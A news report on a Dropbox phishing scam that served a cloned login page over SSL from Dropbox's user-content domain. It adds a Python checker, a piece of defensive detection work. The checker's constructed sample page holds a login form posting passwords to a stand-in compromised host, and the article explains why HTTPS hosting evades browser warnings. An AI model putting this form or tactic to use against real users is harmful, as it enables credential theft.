Dropbox users scammed into handing over credentials through a phishing page served over SSL

After the reported leak of 700,000 Dropbox user IDs and passwords, which Dropbox denies were stolen from its own servers, users are wary about Dropbox security.

Now a new way of stealing Dropbox credentials has emerged. Cybercriminals are trying to steal credentials for Dropbox and for web-based email services with a fake login page that is hosted on the file-sharing service itself, taking advantage of the fact that it is served over a secure protocol. The scam was discovered by Symantec.

The modus operandi

As usual, the potential victims receive an email with a subject line marked 'Important' from a known party (who has usually been a victim already). The email claims to contain a large file that can only be viewed through Dropbox. Once the victim clicks the link, he or she is led to a cloned Dropbox page that asks for Dropbox credentials.

The problem with this cloned page is that it is served over HTTPS, so the browser shows https at the start of the URL, and it carries an exact replica of the Dropbox logo. This convinces the victim that they are on a real Dropbox page, and they hand their credentials to the cybercriminals. The image below shows the page in question; it can fool even a careful user.

[Image: Dropbox 1.png, the cloned Dropbox login page]

Login page served over a secure protocol

As soon as the "Sign in" button is clicked, the username and password entered in the login fields are sent to a PHP script on a compromised server, Symantec's Nick Johnston says in a blog post.

The criminals' strategy of hosting their cloned site behind a secure protocol works in most cases. The stolen data is also sent to the crooks' machine over a secure connection, so nothing raises the victim's suspicion. Had the form posted to a plain-HTTP endpoint instead, the browser would have warned, since the fake page itself was loaded over an encrypted connection, that the data was about to be sent over an insecure channel where a third party could intercept and read it.

Johnston adds in his blog post that not all of the phishing page's resources are delivered over SSL. Browsers flag such mixed content with a different padlock icon in the address bar, indicating that parts of the page are insecure. For most users, however, seeing a padlock and https at the start of the address is reassurance enough, and that puts them at greater risk.

“The fake login page is hosted on Dropbox’s user content domain (like shared photos and other files are) and is served over SSL, making the attack more dangerous and convincing,” says the researcher.
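The two tells described above, a login form on an HTTPS page that posts credentials to a different host, and page resources loaded over plain http, can both be found by static inspection of the page source. The following is an added example, not code from the article or from Symantec: a small checker built on Python's standard-library HTML parser. The page URL, the HTML and every hostname in it are constructed placeholders for this example, not real phishing infrastructure.

```python
"""Static checker for credential-phishing tells in a fetched HTML page.

Findings reported:
  cross-host-credential-post  a form with a password field posts to a host
                              other than the one serving the page
  plaintext-credential-post   such a form posts over http rather than https
  mixed-content               a script/image/stylesheet/frame is loaded over http

Added example; the sample page and hostnames below are constructed, not real.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Tags whose src/href fetch a sub-resource (an <a href> is navigation, not mixed content).
_RESOURCE_TAGS = ("img", "script", "link", "iframe")


class _FormScanner(HTMLParser):
    """Collects forms (with whether they contain a password field) and http:// resources."""

    def __init__(self):
        super().__init__()
        self.forms = []               # each: {"action": str, "has_password": bool}
        self.insecure_resources = []  # sub-resource URLs fetched over plain http
        self._current = None          # form currently being parsed, if any

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "has_password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current["has_password"] = True
        if tag in _RESOURCE_TAGS:
            for attr in ("src", "href"):
                url = a.get(attr)
                if url and url.strip().lower().startswith("http://"):
                    self.insecure_resources.append(url.strip())

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def analyse_page(page_url, html):
    """Return a list of (finding, url) tuples for a page served from page_url."""
    scanner = _FormScanner()
    scanner.feed(html)
    page_host = urlparse(page_url).hostname
    findings = []
    for form in scanner.forms:
        if not form["has_password"]:
            continue  # only forms that collect a password matter here
        action = urljoin(page_url, form["action"])  # resolve relative actions
        target = urlparse(action)
        if target.hostname != page_host:
            findings.append(("cross-host-credential-post", action))
        if target.scheme != "https":
            findings.append(("plaintext-credential-post", action))
    for url in scanner.insecure_resources:
        findings.append(("mixed-content", url))
    return findings


# Constructed sample: an HTTPS page on a file-hosting "user content" host whose
# login form posts to a PHP script on another server, plus one http stylesheet.
SAMPLE_PAGE_URL = "https://user-content.example/s/abc123/dropbox.html"
SAMPLE_HTML = """
<html><head>
<link rel="stylesheet" href="http://cdn.example/style.css">
</head><body>
<img src="https://user-content.example/s/abc123/logo.png">
<form method="post" action="https://compromised.example/login.php">
  <input type="email" name="email">
  <input type="password" name="password">
  <button type="submit">Sign in</button>
</form>
</body></html>
"""

if __name__ == "__main__":
    for finding, url in analyse_page(SAMPLE_PAGE_URL, SAMPLE_HTML):
        print(f"{finding}: {url}")
```

On the sample the checker reports the cross-host credential post to login.php and the http stylesheet; it does not report a plaintext post, because, exactly as the article describes, the exfiltration itself goes over HTTPS. A form on the same host posting over https produces no findings, so the check separates the phishing pattern from a legitimate login page rather than flagging every password field.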

This is not the first case of abuse of the Dropbox cloud storage service. In late August, an SMS phishing (smishing) campaign was observed relying on the same method, the difference being that the crooks delivered a cloned Facebook page instead.

Given the scale of the credential leaks that hit the web last week, users are advised to exercise caution to avoid falling into such traps.